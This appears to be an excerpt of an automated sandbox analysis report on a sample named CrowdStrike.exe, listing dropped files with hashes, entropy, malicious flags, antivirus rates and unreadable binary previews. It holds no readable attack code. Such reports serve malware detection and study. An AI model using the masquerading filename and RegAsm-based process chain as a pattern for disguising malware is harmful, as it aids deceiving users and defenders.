                                                                      Preview:.E..u...........E.PI.......E...........E...........E......E..I....................$..9C..E.PI...E.PI...E.PI...E.PI...E..PI..u....E..PI..i....E..PI..]....E..PI..E..u....M......E..]....]....E..PI....E..PI....E..PI..E..u....E..]....]....E..E.....P.]...Y..u...S....!....E...^..]..8C..8C..8C..9C..9C..9C..8C.!9C.w8C.k8C.-9C.P9C.Y9C.b9C.U..QQSV.....V.5..L.....E...YY.M.........#.QQ..$f;.uT...YY..~-...~....u#.E.SQQ..$j........qVS.C....E.YY.c.E...x[J.S......\$...$j.j..?.D...U..E..........Dz.V..S........E.YY.... u.S......\$...$j.j.......^[..].U..QQSV.....V.5..L.....E...YY.M.........#.QQ..$f;.uT...YY..~-...~....u#.E.SQQ..$j.........qVS.l....E.YY.c.E...x[J.S......\$...$j.j..?..C...U..E..........Dz.V..S...'....E.YY.... u.S......\$...$j.j.......^[..].j.h..K..O..3..}.j..b..Y!}.j.^.u.;5DrL.}S.@rL......tD.@..t.P.....Y...t.G.}...|).@rL...... P..H.I..@rL..4.....Y.@rL..$..F..E.............WO...}.j..|c..Y...L....L....L..x.L..U..M...u...Q.........S..j.X]...L...3.].U..M
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):17408
                                                                      Entropy (8bit):4.379499760982806
                                                                      Encrypted:false
                                                                      SSDEEP:384:uQXoSpu88888888888888888888888888888zv888888U:Zxi
                                                                      MD5:DEE42E543988CD988E8AEB4B03F488EB
                                                                      SHA1:6FDBDB074AFD4BE01A444344B7BD00ABDDD074AA
                                                                      SHA-256:8F444581168196C045FABDE65F1C0667154AFE2FE6302E7FF342AEFD3B6B829D
                                                                      SHA-512:563007A505269BF7645F9A4D6D3DB4AF1B00D30E0C1005E43604C8FBDD734BD31FE2A4D658D23EBC683CA1AC8D795ABE3A0BA2E8A5BD3458505B04B58DC362D3
                                                                      Malicious:false
                                                                      Preview:~.~.~.~.~.}.~.~...............r.r.r.r.......................................................}.}.}.}.}.}.}.}.}...................r.r.r.........................................................................................................................................................................................................................................r.r.r.r.r.r.r.r.........................................................................................................................r.r.r...............................r.r.r.......................................................................................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.................r.r.r.r.r.r.r.r.m.m.m...m.m.m.m.m.m.m.m.m.m.m.m.m...m.m.m.m.m.m.m.........m.............m.....r.m.m.r.r.r.r.r.r.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.!.z.z.z.z.z...j.j.j.j.j.
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):22528
                                                                      Entropy (8bit):6.432021585344872
                                                                      Encrypted:false
                                                                      SSDEEP:384:x4w4aR2NQ+p5aH6tTWJI+K4/WkWyKBkPJnvRZCJK5HBxfExrIcqdw3y:xOQ+pAagJInAWiJnvqK5DfExMc2Yy
                                                                      MD5:6DB6B2AE5BAAE977FAE168E4A08641B4
                                                                      SHA1:D3110BFD3DCA6929A80A09BEC4E8BB07C2603806
                                                                      SHA-256:88C137E5726172061F509246ADA7D2D3CB8E5DABCF35CADF1D49C49B073A80A4
                                                                      SHA-512:8D766C2EC9DB083E8F8A182CF930069CECBD087526552FD626B7ACD7445F5024D192E6144641F5FE9AEA206FDFA1AD8D8390853C97B439176EA905BFB2B61B58
                                                                      Malicious:false
                                                                      Preview:i.....[..2._^]...U...0SVW..3.V.]...|.I..}..^..^..G..H...........$..vE.j.X..f.........t......3.f.F......j.X..f...,........j.X..f...v....^.....j.X..f.......F..V.....j.X..f..........j.X..f........G..0..x.I....... ..Wf...H..........u.......C...SV..X.I..6......u...S.M......P........E.P..\.I......j)........t.j.Xf...F..........j*...p...........3.@f......... ..Wf...)....F.....j$Xj(f...^.....Y..ta....u...S........Mj$Xj(f...^....Y..t:....u...S........&j$Xj(f...^......Y..t....S...P...P.....^..Cj$Xj(f...^..T....E.Y..t..E.3.P..C.-....M.P.........F....t..M....._..^[..]....I..tE..uE..uE.CuE.`uE..uE.1uE.suE..tE..uE..uE..vE.UvE..vE..vE.U....V.u...M..x...P...=....E.P..\.I...^..]...V..V..|.I..f....f..^.V..V..\.I..f...f..^.U..V..V..\.I..u.V..X.I.^]...U.......V.u...L$......P........D$.P..\.I.^..]...U...0SV.u.W.~....Q..............E.PSj...0.I.....2...3....~*.E...AQ.M...|...............M..D...M.;.|.E......f.H..E..@......u...,.I..........E.P..|.I..E..}.P.u..}..}.}..E.......(.I...x|
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):56320
                                                                      Entropy (8bit):5.55892208875502
                                                                      Encrypted:false
                                                                      SSDEEP:768:QOU+aI4kSmEusWjcd+DvFQC7VkrHpIu9xhSaAwuNbCc/mu:/+usWjcdGQuklIusaAwu9h5
                                                                      MD5:05607FDAAA89639249B09951F5624870
                                                                      SHA1:F09748593248E10B4F70E83BF1E81DF5BF07FE2E
                                                                      SHA-256:11BDE3AF35BD166FEA20604167525CC28A2EB2FD0BC66B054C190AF00447F50C
                                                                      SHA-512:E94927608D2E4DC8024033BE66913D63367AD82625252E13FD453BB7500721EA8AB712D9CEFE91ED8F99243D65DB51825C66F73E5E061E8D67CD33B0E6608175
                                                                      Malicious:false
                                                                      Preview:d.N{.?...c.1.=.f..k..?iO...).=...m...?.....R.=.l[..].?..$.i.=.w/.d..?....C..=..(.O..?u..1...=.../.D.?.. ..&.=... ...?i.C1.].<.Ei....?X.=.g..<.P.~.0.?Y.;....=.. ]...?....m..<.......?.A.8.y.<..7.l .?S.6....=..=..q.?+`.....=.......?...%!5.=..o.h..?..y....=.i.Q.i.?v.7....=.....?dDR.;.=.nl....?b.*t#..=.x.A@h.?.......=.ZmI...?..oP.@.=...Y...?......=.....n.?u..?..=.%.k...?ZEM-'^.=..DT.!.?:Z..n=.=...0.|.?..O....=....*..?m}I..{.=...eP5.?+.}ZI..=..Q....?.^o.c;.<..'....?.u./r..<.....S.?.i...1.=...q...?/......=.{.ss..?VV&....=..#.k~.?[......<.......?vB.....<.6..#M.?...!..<.......?q_.w.#.<.....".?...R..<.......?k.=..C.=...B...?..._...<.u...r.?.y.....=.Dw.b..?.(,x.n.<.<".Q/.?...q.q)=..o\l.?.)...T&=..7a..?....L..<..?|6..?.......?#.DZ9..?.......?../....?>6)}...?, .,...?......?M......?..x%q..?.. ....?/x.bJ..?.b....?.u....?(Z.....?..t....?{}.2F..?.......?_.2...?>.T.^..?.u.....?.......?4t..d..?...Z...?(......?WI..Y..?...d...?.{.....?|...:..?..S9...?...s...?.......?....K..??......?l......?.Z
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):18432
                                                                      Entropy (8bit):6.467727872360408
                                                                      Encrypted:false
                                                                      SSDEEP:384:LWtiHUZiSkd28M1AD+FrhnTUR5ApVdbhY9TngaVS/o7vz6U1j1wW+dGY9:LWtrJADK1c+d9Y9TnzA/o7uGwr99
                                                                      MD5:667C656C256FB6F9DAC378A215CA7DED
                                                                      SHA1:8F7976EC383BA08253194E738C966C90620DA6F4
                                                                      SHA-256:379D9E9E4E9DF9C19A992C94FBF6DED32D00AF9DF1B9C758F1EF1E7ECC9354E4
                                                                      SHA-512:AE92C01AC5E897193137BEC654460633E001B2CA661033B62E613982B96A32C1251403EEFC88AE8F04DE92AF99C8663BE882A75D1AC99A419A052107D6FF7B65
                                                                      Malicious:false
                                                                      Preview:......|.....f........|.K......f.............3........3.Aj..f........P.K......f.3...............................K......3..............................0.K.....3......... ...............,....<.K......3...D.....H....@........[..f...V.......f..|.K...p......K...t...3..h.........l...j.Z..x......K....................j.Yj..f..........K......f.3......................f.........K.....f.3...............................K.....3......................f........ .K.....f.3...4.....8.....0....Z..f...F.......f...X.....`....\.......3....K.j......l.... .K......3.........................f..........K.....f.3.......................[j............K.....3.......................f..........K....f.3.......................f..........K....f... .....(.....$...Y.3...<.......K.j.Yj...3...L.....P.....H.....d....0.K..Yj...3...t.....x.....p....}..T.K..Y..3..]..}..E........f..}.....f.3..].}..E.....3.f.E...M.f..].]...5...}.j;._...._.._..]..G....._V....9..3.f9.t.V...9..f98t.F..3.}.........VQS.M...7..V...
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):5120
                                                                      Entropy (8bit):5.833657029238311
                                                                      Encrypted:false
                                                                      SSDEEP:96:XvmFmLAcevOTCigna+JAKJjc4IWE6GD++9rW8IiJJ0r2H6g+dUMLEl4fmc:fmFmLAceGei0jc4IWSnF1JdHJMol4ec
                                                                      MD5:2F2019F3BD64739D103D817B127D0A99
                                                                      SHA1:E4CC97BFB8BF7B3402C84BF5B29C3361AE96B108
                                                                      SHA-256:3B5CDBE38B52A00825DA484F31421942A3EE67F7576ABAB754B2B56B4AE62430
                                                                      SHA-512:21F918B8FBE39F8D2573D49B5B8D71C5B744DA3C658679EF2C7302070DD4E99183674CB72330091705DCE2837BC3AC2E6C3D03EB5B11BEC4A5FBE12AD7E83EF1
                                                                      Malicious:false
                                                                      Preview:(.f......X...Y...\.f..|$..D$....~.f.W.f./...I.sO..~..I...~-.I...~...X.f.s.,f...f.~..@..~,.h.J...~...\...Y...X..I...^.f............~...~...I...^.f.....~..X.J...~$.`.J.f.(.f.Y.f.(.f.Y.f.(-..I.f.Y.f.X-..I.f.Y.f.X-..I.f.Y.f.X-..I...Y.f.(.f......X...Y...\...\...\.f.V.f..D$..D$..f./..I.u..D$..f./. .I.s...(.I...(.I......$..$....D$....(.I...(.I..D$....~...~...I.f.T.f...z..D$......(.I......I..........T$......T$..T$...$.........D$......U.........$..~.$.......f..D$.f..%..I.f.....I.f.W.f.....I.....f.s.,f.~....... ..f.............#.-....=............Y........\...Q.f.T.........f...U@.I.f.V.f.($.@.I.......X...\...Y...Y...Y.......X...^.f.....I.f..-..I...\.f.s.?....f.s.?..Y.f.p.Df..5..I...Y...Y....f.W...Y.f.\%@.I...Y...X...Y...\.f.p....X...\...\.f..D$..D$.....-......A..-...f.s.&f.s.&f...f.U...\.......Y...X.f.V...\...Y.......\...Q.%.............f.T.f.s..f....f.V.f.n.f.p............Y<.@.I...Y...Y...Y...\.f.T.P.I...X...\...X.f..-..I...\...X.f.....I...^.f.....I.f.X..@.I.......Y...Y...Y.....Y...
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):35840
                                                                      Entropy (8bit):5.212882329230249
                                                                      Encrypted:false
                                                                      SSDEEP:768:YGHv7mlHW7nIhp/lNVi6dFiwc/RGNul1Eovu86eV3QKYwlrRX9G:BPt8gNpkU5uG3xYw8
                                                                      MD5:E295EFC64F30FDEDA3F9A2C87FBBB2B6
                                                                      SHA1:2D18E230EEE1012B4D16CBCF0CE9FC872745908E
                                                                      SHA-256:6D1C8EAC247DE123D533E26EBA1BFDDC1158ACD0AA15E215BC33632BD0A8F2CD
                                                                      SHA-512:BE018C29DD8C09961A9FAD909BE2DC5183F789A25E5466DB1ABE88A46493DEC2C12D03B9A5277A331C6F29144BD9668C88756310CB1D609C6DA5EDB3FCCF180A
                                                                      Malicious:false
                                                                      Preview:...4...L.........j .D.....Y..tJ...W......L..4...L..u...~.......E..F..E..F..E..F....L.j@@Y..._....L.^]...3..U..SVW.u..8.......L..>..t.9_.t........L.|.3....U....T.....t.._^[]...U..E.VW3..P..8........~....>k.!..F;.|._^]...Wj@...L.3.Y...!...L..._.V.q.;r.u.......t.f..f;.u.......Nu..^.2.^.V..F...u..v......6....YY^.3....t....t....t..j..c...j..\...U..SV.u...W.}.VW.Z.....u.VW.........t._^[]...VW.E.....u.VW...A.....u.VW.......u.3.@..3.8......U..3.9M.v..U....A..t.;M.r.2.].......U....S.].3.V.u...M.E..E.W....t.8...........;.r..}.3.A;.v..<...........;.r.E..u..E...y.....K..]..E..E..E._^[.]..E....[J........E..]..E........@..]..E....[J....@..]..}.......Au.........A..[.............Au"......At.3...]...G.E...@.Z...j.X........U..M....rCSVWj.X....It-.}..<:.\:......................u.;.r..u...u.3._^[]...3.....u...j......j............U..QSV.u.3..M...W..t..}...8@..t>...w.;.r..tV....._^[..]....J>...v".J ...v$......v&_^3.[..]....9.u.................~.........t.........U..}...E.r......t....t"
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:OpenPGP Secret Key
                                                                      Category:dropped
                                                                      Size (bytes):53248
                                                                      Entropy (8bit):4.890982629038364
                                                                      Encrypted:false
                                                                      SSDEEP:384:QU84444QnoooooooooooooooooooooooYooootooooooooooooooYooooooooooH:5S+AGWBA60iPTcf4qSq25N8EH/i6mxA
                                                                      MD5:E859420711C0FAFFEDF33DA17A2EB4B1
                                                                      SHA1:B95E9D9A48D0AB427759A724D399DDE97C11E463
                                                                      SHA-256:5010762DC34EB3679AFE29CDA9C2040309D8A784BEA758F64ED4977773C20465
                                                                      SHA-512:E605A4F8986A1CA90E1C8D58A097D867B9866D159F05D2A9E150C8301FBEE6C672E2C4958D8B79AE251DE8B596D9ED5EAACD9CEF4071251FF7D4374F0EAED8F1
                                                                      Malicious:false
                                                                      Preview:................r.r.....r.r.......r.r.r.r.r.r.r.r.r...r.r.r.r.r...............r.r...............r.r.r...........r.r.r.r.r.r.r.r.r.r.r.................................................................................................................................................r.r.r.r.r.r.r.r.....................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.............................................................................................................r.r.....................................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...........................................................................................................................................r.r.r.r.r.r.r.r.r.r.r.....................r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r.r...................................................................................................
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):11264
                                                                      Entropy (8bit):4.209323491661389
                                                                      Encrypted:false
                                                                      SSDEEP:96:miiKX1Od5T1A/nYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYtz:vOTy5
                                                                      MD5:4DD2539DAA375331505B81E8BAD6F6F3
                                                                      SHA1:D4A96C82BE8D208E4F52150D9914C6CE892EEBA1
                                                                      SHA-256:2FA5DFE0785E6E2EE3CF30277E09BDB46D2B7FC096D40D6AAF78EC27F5B6B68B
                                                                      SHA-512:1DDE574858DF1059BA7F7708B866EF2C15D65956C85D8F4E449BECEF37ACB1D6D1597B3E26F44F2447F6F4D5D93AF47A7E22312E0B4A5C1F5CE2E593CCD59BFA
                                                                      Malicious:false
                                                                      Preview:&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.%.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.&.r.r.r.r.r.r.r.r.r.r.r.r.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.;.r.r.r.r.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.r.r.r.r.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(.(...................................................................................................
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):6144
                                                                      Entropy (8bit):6.573279460932987
                                                                      Encrypted:false
                                                                      SSDEEP:96:ah9np2h41CzOKFM0FPd386YpQorIR8VXX7wUEwdJEIZr8qsaC+Xljytv:ahlE41OOT0F1s6YyeXpLwBEJEYb9Jje
                                                                      MD5:A964F4C9C7CA51DAC3A481EB260810C3
                                                                      SHA1:00421532D7C22082FC8314ADD4D31C153D27442D
                                                                      SHA-256:547AE8F99A07865535955A2B3913C9F8D5B06EB08AFE36816F60841E19024CD0
                                                                      SHA-512:B866FB7481C5D7C17593ADFDC502EDA1D80BAD017AFE51FAF491703561EF687C573E54D38A5D740A49EB7F78F1CEF1E3171D83DF36CF4EE22C1A75C531E1072F
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8734
                                                                      Entropy (8bit):7.4059445349608986
                                                                      Encrypted:false
                                                                      SSDEEP:192:XIncwVQ9xZSVZPNC3noFCe46qd8ZMPVc4VqzfkMQ3o:XJ9eVndCqT4EwMQ3o
                                                                      MD5:A697F5B323EDB5A6D12F600269FA21BD
                                                                      SHA1:80307B69FCBC0B88F4CC8A201F4C6D22F6FCA5A5
                                                                      SHA-256:A512FED0ED89A361C73452E6F8C4C4ABAE1442A38D2F2D152065E96B29F2EA65
                                                                      SHA-512:20474C47E52876170788CF99B3664EDD8D325C3C6B1B9FD58CE597DA0047B27F0E7E0A8A80F4BEA05C96992EA675201498830D1A3B085B21A6211C81C0C8775B
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:DOS executable (COM)
                                                                      Category:dropped
                                                                      Size (bytes):53248
                                                                      Entropy (8bit):6.138590026121251
                                                                      Encrypted:false
                                                                      SSDEEP:1536:w4ztrgWVrZ+In23SwFc1vtmgMbFuPO1MBNfMBNx:3ZaUAg0FuPOKBNEBNx
                                                                      MD5:872A95B540C0E493D57D0D30A6DA3F43
                                                                      SHA1:32080524D58B810FEA453C83FC4A927B802CADD7
                                                                      SHA-256:44135E9284EF8EEFDC9076514D9C79699A7326AE2ACF95D03FA19CEA2057E10A
                                                                      SHA-512:48827A9C6145FE7E4E35493F4EE9F3D9A1A3EC233E7F46825F59AE5E093E83C615F8F424A3F05D951760B0D9983AB98643317AA79CD2F579CCF6E34AAC430565
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):168960
                                                                      Entropy (8bit):7.998890071589778
                                                                      Encrypted:true
                                                                      SSDEEP:3072:oXAGdsQKupzym7OvekyN4gwDLZDzbU6yYujd9VwtYg9z6w1o3FkHtqILVcBBGJmT:o5aQKu1yoGeBGLZD3U6yYQWYg9z6wykc
                                                                      MD5:03F165D90E5230AE30F39D1C9EB7A770
                                                                      SHA1:4D30829547839A5C31250FC389B07EDE3124A883
                                                                      SHA-256:528C3017CE896BD42CAD6AA9199F0A14B0673A27618A6D3CD4C16DDE4DA903BE
                                                                      SHA-512:C4C8076AAD717AEAC1F799B0891E7D2C741886F54B3F28CF3E13F11863258B53EBC2DA91E25E3A386BBFD919906911F3D2FE7F79ACAECB98EF7947950A577A7A
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):6.483058023596733
                                                                      Encrypted:false
                                                                      SSDEEP:1536:D6CV21YEsmnq7Cv/+/Coc5m+4Xf8O46895LmNg:GCV26MqgQTc5F446iYNg
                                                                      MD5:044E398EC410457FFD2F42DBC3EF5D70
                                                                      SHA1:F45E57234014749B0D3C0A0F46E0694F6BEA01ED
                                                                      SHA-256:01F2D93D90F2F593356B9328A1225469D42186A5B664E3A05BC4E5236E9CD03F
                                                                      SHA-512:A74DE980BAC35C2B2C7332945821A946F69FC6892155F17ABE8DB41C4EE982AD88F2309607E6888DAE72CF279DB4B32DB64258CF15B605ABDB703157FC20C92B
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      File Type:PE32 executable (native) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):3968
                                                                      Entropy (8bit):4.961101807608474
                                                                      Encrypted:false
                                                                      SSDEEP:48:QMmPrxEkBbiCzjPAkrc6dU4z13Be5P2dbH7xHToqBRAZ4w:IFEkICnPA8cAiEromy
                                                                      MD5:DA663D3EA0C818A60292E5239EF23DAE
                                                                      SHA1:72F43721AD2B5A0C84360E171361E5DFA606E86F
                                                                      SHA-256:9E519211947C63D9BF6F4A51BC161F5B9ACE596C2935A8EEDFCE4057F747B961
                                                                      SHA-512:2EF7535C2A9D860EBE0EEEE34949E330F765ECD10FCDCF74D2C5B7F6EBBDF64A2E25ECB420B4044E6F4C07DE692F8BACCE626067CBE145B3EED713AA1EDB2F13
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 3%
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8192
                                                                      Entropy (8bit):6.525398386998519
                                                                      Encrypted:false
                                                                      SSDEEP:192:jIhwLZXBlHoLGqoozNnmd+/YLlLGcopEII6XBfoLgn:0CvEGqooAdQGcA6XBwMn
                                                                      MD5:F335E743D9A5D72A068210A9C9F605E3
                                                                      SHA1:5BA897EC85ABEADED76708A92A716EA44FD199E1
                                                                      SHA-256:E5DC3C6C185C46FB75C682327750A542D0A84F7C17CAA39469755EADEEF37BA7
                                                                      SHA-512:5B245023C0881C9BD0EA7BACFC293C4C25FF876754FCBE32BB271FB561CB2D9876ECE709106C7A0F6267EB9BFA0ACCD8A6E01BCB824E1ADE80D1407BB692A860
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):49152
                                                                      Entropy (8bit):6.677466195008743
                                                                      Encrypted:false
                                                                      SSDEEP:768:9w4sWGuv6crjQAVlvZEx2zinQD2tR/i01A/ES4KY2lfwMwstd7t+Jv/awuUd:fo/RIs2ziQD2tR/i0027EM/awuUd
                                                                      MD5:C187E58A09247BD0E6D373E8E7432C12
                                                                      SHA1:AED07C0015989F623AE42AA206351551AB053B46
                                                                      SHA-256:AD9A2BD7C9CCC68820DDCBEB670F097FDD4C6BE734C46CB4236970846F293645
                                                                      SHA-512:C3B383799F5326F0977D4A47792622621C6F24D34EA18258D32DE893F859FB291F43E252B8775F6B426F6DA7D03D4ED9A014AF7ABAEDD101272D235257EC99EA
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):69632
                                                                      Entropy (8bit):6.809511599866774
                                                                      Encrypted:false
                                                                      SSDEEP:768:acDP8WBosd0bHazf0Tye4Ur2+9BSCVoyO15DuOKHnrxbxZiUCu2iPaLTQ7Q1tCw5:QWyu0uZo2+9BBVgCOa1ZBPaPQaEwos
                                                                      MD5:8C1308689913B76D47B2FEA6C94378C6
                                                                      SHA1:E0202520E3A20062037C4F8AE5A5F17D6C4E803B
                                                                      SHA-256:E0055A2B04595818CDC4B3C5EDB54539E5C3EDF69E134914E6BAD45AB56D0A04
                                                                      SHA-512:0F8EF3408371A94E16833884E14C219E68330DC62468EEB37D50169EDAF3516F9871A79A4753BBB8560C969410B0B0B9C5F3D8BC9FE4878EB056BB84C07AAA71
                                                                      Malicious:false
                                                                      Process:C:\Users\user\AppData\Local\Temp\564784\RegAsm.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):860160
                                                                      Entropy (8bit):5.0967320883703415
                                                                      Encrypted:false
                                                                      SSDEEP:6144:rPAfPpmqCjbiNhfN7qWTfTGzlXgzj/kRm7lKZy7Pu4WQLvlMatE1:uCnw6WTqzlQ3hlJGv1atE1
                                                                      MD5:3663BCE9A86D8A619DCB64DC6FFBADEE
                                                                      SHA1:62EB14A3A649F13DD73B856029C4489CC814A1BE
                                                                      SHA-256:8316065C4536384611CBE7B6BA6A5F12F10DB09949E66CB608C92AE8B69E4D67
                                                                      SHA-512:B2B833CD93A3A7ABF78336726F043CE8AE8DEBE67314ED37B580C666A4101FEA86FB7D94C9ED624DC05DE09D2D47678EAE90C12B234632A21E327854E120E108
                                                                      Malicious:false
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                      • Antivirus: Virustotal, Detection: 0%
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):37888
                                                                      Entropy (8bit):6.597842547264202
                                                                      Encrypted:false
                                                                      SSDEEP:768:xywqp9sK1xhNGE0psu0nM8+aZKINulI1+lRg:EMK1zN90psu0nMOKzlvlK
                                                                      MD5:D0808D4907E66F73A821AB6E7FC942C1
                                                                      SHA1:3A9712C755A6D07CD160730E997BF5CCD4277F42
                                                                      SHA-256:221EEE5A84FDE75849816CDBB84F723E5C96A3E81922692DB21E7844B8537A04
                                                                      SHA-512:1FC978F3172CA04011091D0053CA89A8D872FDCABB3B934B31D6820A8F166ABD0517F2FC854931C76E2E45C40BCF4900F58BD20D57697C1140A03C5E098D3308
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):43008
                                                                      Entropy (8bit):6.659508652100811
                                                                      Encrypted:false
                                                                      SSDEEP:768:rSRWG7iksc7nj6evkuKa5GCJ5YxtXazSTvHZ9ijrUTSu7YeQ0pP:rWWGlHHvpKa5Gk6/vij4Nn
                                                                      MD5:30A726E5E8BE06D5588E9E38E5397666
                                                                      SHA1:D50E8F4502CBE6AD01BC6A4A3A276A4DE7687F4F
                                                                      SHA-256:5B40C05D64F0A1E5A32CA865B3CE9BF6F3747239A56A17EFF1F91DE491D0ED4C
                                                                      SHA-512:09C61BDBB7FF21F9D66D51A729C241998D35DBCD7A7E6EF46C684E78B751B06F0C5F369127CE84FDEF6D3BA1DCA71BAA7211827803A6B72490E6AA7D65253BEC
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):29696
                                                                      Entropy (8bit):6.466915732622778
                                                                      Encrypted:false
                                                                      SSDEEP:768:gpZP40VLhDPCp5eqMw0jR6s6bvx875rLjDsOc/WYs:g/Pp5q/qw0j8sgy5
                                                                      MD5:9EC558FAB0F745994DA7126E5D9E778B
                                                                      SHA1:24DFB7029412EA93A7D91927D4918933B2C8CDB2
                                                                      SHA-256:24001792498C0D036909D29887678E7F123276BEC12AA7B11A1B3B082D4A2B8B
                                                                      SHA-512:A2263A30A17CE26358B5B8F245D1C252FBB149D9FD2CDDCB41DAB3C3ABD8822F06F86151F6973D1101E54A96FC377601FB9B0DBF982E1CAA1E9AD02DEFFF26F9
                                                                      Malicious:false
                                                                      Process:C:\Users\user\Desktop\CrowdStrike.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):52224
                                                                      Entropy (8bit):6.6823321284757435
                                                                      Encrypted:false
                                                                      SSDEEP:1536:TpQ4VMEPmfP/b/psgrO4aK9iwcznrQfy0c4cDTOelOFCOBSljvj5h:FQ6ClAMfA4lelIJBSLh
                                                                      MD5:ED3292F153EC8B60B8F7FFB1CA9F0858
                                                                      SHA1:7B32091DDD2282B4A4AEDF4BF3A47A883AE7DD94
                                                                      SHA-256:1E8C217DF502D035EA3B1AC2212C20C9B9DA4DD6FF81D1C3C41A0AF00D8C0D5D
                                                                      SHA-512:C988F25568B1D1E9CC81AFD0DF780FBF371B6BB5FD4CE5F6E8CF36A35DC5AF06BD5DF11E2FE513141B08F8F9F158DBCF5281B105C0B3E6C59129C7F559C24FB7
                                                                      Malicious:false
